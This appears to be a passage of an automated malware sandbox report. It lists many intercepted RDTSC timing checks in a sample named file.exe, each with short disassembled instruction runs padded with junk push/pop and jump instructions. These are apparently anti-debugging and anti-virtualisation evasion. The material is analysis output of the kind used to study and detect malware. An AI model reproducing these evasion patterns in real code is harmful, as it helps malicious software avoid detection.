              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1234DE3 second address: 1234DFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jg 00007FD7F8BAA156h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f jne 00007FD7F8BAA156h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121245B second address: 1212478 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FD7F8DB51F7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F298B second address: 11F298F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12600AC second address: 12600B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12600B6 second address: 12600BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12601E5 second address: 12601F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jns 00007FD7F8DB51E8h 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12605DC second address: 12605E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12605E0 second address: 12605EA instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD7F8DB51E6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12605EA second address: 1260601 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 jns 00007FD7F8BAA176h 0x0000000d je 00007FD7F8BAA15Eh 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1260765 second address: 1260772 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jc 00007FD7F8DB51F2h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126087F second address: 1260884 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1260884 second address: 12608A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD7F8DB51F9h 0x00000009 jp 00007FD7F8DB51E6h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1263A2D second address: 1263A31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1263A31 second address: 1263A3E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1263A3E second address: 1263A42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1263A42 second address: 1263A62 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7F8DB51F8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1263A62 second address: 1263A66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1263A66 second address: 1263A6C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1263A6C second address: 1263A78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jg 00007FD7F8BAA156h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1267A38 second address: 1267A53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FD7F8DB51E6h 0x0000000a jmp 00007FD7F8DB51F0h 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1267A53 second address: 1267A5D instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD7F8BAA162h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1267A5D second address: 1267A63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1267A63 second address: 1267A7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FD7F8BAA163h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1267A7E second address: 1267A82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1267C01 second address: 1267C06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1267C06 second address: 1267C31 instructions: 0x00000000 rdtsc 0x00000002 je 00007FD7F8DB51F1h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jo 00007FD7F8DB5211h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FD7F8DB51EEh 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1268CD1 second address: 1268CEC instructions: 0x00000000 rdtsc 0x00000002 jo 00007FD7F8BAA156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a js 00007FD7F8BAA15Ch 0x00000010 jnc 00007FD7F8BAA156h 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 push esi 0x0000001a pop esi 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126C486 second address: 126C48A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126C48A second address: 126C48E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12705CA second address: 12705E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD7F8DB51ECh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 pop esi 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12705E6 second address: 12705F3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jc 00007FD7F8BAA156h 0x00000009 pop ebx 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127070E second address: 127072A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FD7F8DB51F0h 0x0000000b push edx 0x0000000c pop edx 0x0000000d popad 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127072A second address: 1270796 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD7F8BAA15Bh 0x00000009 pop edi 0x0000000a pushad 0x0000000b push edi 0x0000000c pop edi 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007FD7F8BAA169h 0x00000014 popad 0x00000015 popad 0x00000016 pushad 0x00000017 pushad 0x00000018 jmp 00007FD7F8BAA166h 0x0000001d jmp 00007FD7F8BAA164h 0x00000022 jbe 00007FD7F8BAA156h 0x00000028 popad 0x00000029 pushad 0x0000002a jng 00007FD7F8BAA156h 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1270796 second address: 127079C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1270A97 second address: 1270AA1 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD7F8BAA156h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1270AA1 second address: 1270AB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jno 00007FD7F8DB51E6h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1270AB1 second address: 1270AB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1270C00 second address: 1270C24 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7F8DB51F4h 0x00000007 jns 00007FD7F8DB51E6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1270C24 second address: 1270C28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1270C28 second address: 1270C64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007FD7F8DB51E8h 0x0000000c je 00007FD7F8DB5201h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 js 00007FD7F8DB51EAh 0x0000001b pushad 0x0000001c popad 0x0000001d push eax 0x0000001e pop eax 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1270C64 second address: 1270C6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1270C6A second address: 1270C6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1270C6E second address: 1270C78 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD7F8BAA156h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1270C78 second address: 1270C82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1270C82 second address: 1270C86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1270C86 second address: 1270C8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127016E second address: 1270178 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FD7F8BAA156h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127107F second address: 1271089 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD7F8DB51E6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1274B20 second address: 1274B30 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD7F8BAA156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1274B30 second address: 1274B3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FD7F8DB51E6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1274DF1 second address: 1274E17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FD7F8BAA156h 0x0000000a pushad 0x0000000b jmp 00007FD7F8BAA161h 0x00000010 jnl 00007FD7F8BAA156h 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12773A2 second address: 12773C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7F8DB51F5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b je 00007FD7F8DB51E6h 0x00000011 jp 00007FD7F8DB51E6h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12773C9 second address: 12773CF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1276F61 second address: 1276F65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1276F65 second address: 1276F69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127B3B8 second address: 127B3BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127B3BE second address: 127B3CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jbe 00007FD7F8BAA156h 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127B504 second address: 127B508 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127B508 second address: 127B526 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007FD7F8BAA166h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127B526 second address: 127B548 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007FD7F8DB51E6h 0x00000009 jmp 00007FD7F8DB51F7h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127BAF1 second address: 127BAF7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127BAF7 second address: 127BAFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127BAFD second address: 127BB01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127BB01 second address: 127BB26 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7F8DB51F7h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jne 00007FD7F8DB51E6h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127BB26 second address: 127BB2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1280137 second address: 128013B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128013B second address: 1280141 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1280141 second address: 1280147 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1280147 second address: 128014D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128014D second address: 1280151 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1280410 second address: 1280418 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1280418 second address: 128041C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128041C second address: 1280420 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1280420 second address: 1280448 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FD7F8DB51EEh 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 pushad 0x00000019 popad 0x0000001a push esi 0x0000001b pop esi 0x0000001c pushad 0x0000001d popad 0x0000001e popad 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1280448 second address: 128045A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD7F8BAA15Ch 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128045A second address: 128045E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128045E second address: 1280480 instructions: 0x00000000 rdtsc 0x00000002 js 00007FD7F8BAA156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD7F8BAA166h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1280480 second address: 128048A instructions: 0x00000000 rdtsc 0x00000002 js 00007FD7F8DB51E6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123474E second address: 12347CF instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD7F8BAA156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007FD7F8BAA158h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 0000001Ch 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 mov edx, edi 0x00000028 mov ebx, dword ptr [ebp+124878FFh] 0x0000002e and cx, FD9Fh 0x00000033 jne 00007FD7F8BAA15Ch 0x00000039 add eax, ebx 0x0000003b or dword ptr [ebp+122D2638h], ecx 0x00000041 nop 0x00000042 pushad 0x00000043 push ebx 0x00000044 jmp 00007FD7F8BAA15Fh 0x00000049 pop ebx 0x0000004a pushad 0x0000004b jmp 00007FD7F8BAA15Eh 0x00000050 js 00007FD7F8BAA156h 0x00000056 popad 0x00000057 popad 0x00000058 push eax 0x00000059 push ecx 0x0000005a push eax 0x0000005b push edx 0x0000005c pushad 0x0000005d popad 0x0000005e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12347CF second address: 1234811 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007FD7F8DB51E8h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 0000001Ch 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 push 00000004h 0x00000024 mov ecx, dword ptr [ebp+122D189Fh] 0x0000002a push eax 0x0000002b pushad 0x0000002c push ebx 0x0000002d jc 00007FD7F8DB51E6h 0x00000033 pop ebx 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 popad 0x00000038 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128085A second address: 1280861 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1281259 second address: 128126A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD7F8DB51EDh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128126A second address: 1281275 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12847A0 second address: 12847AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12847AC second address: 12847B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12847B2 second address: 12847B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128ABDB second address: 128ABFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FD7F8BAA169h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128AFDB second address: 128AFE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128B59F second address: 128B5A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128B5A4 second address: 128B5AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128B87A second address: 128B889 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 jnp 00007FD7F8BAA15Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128BAF8 second address: 128BB1D instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FD7F8DB51E6h 0x00000008 jmp 00007FD7F8DB51EDh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007FD7F8DB51EEh 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128BD98 second address: 128BDB3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7F8BAA167h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128BDB3 second address: 128BDBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1290D3D second address: 1290D5E instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD7F8BAA156h 0x00000008 je 00007FD7F8BAA156h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jmp 00007FD7F8BAA15Eh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1290D5E second address: 1290D64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1294977 second address: 129497F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
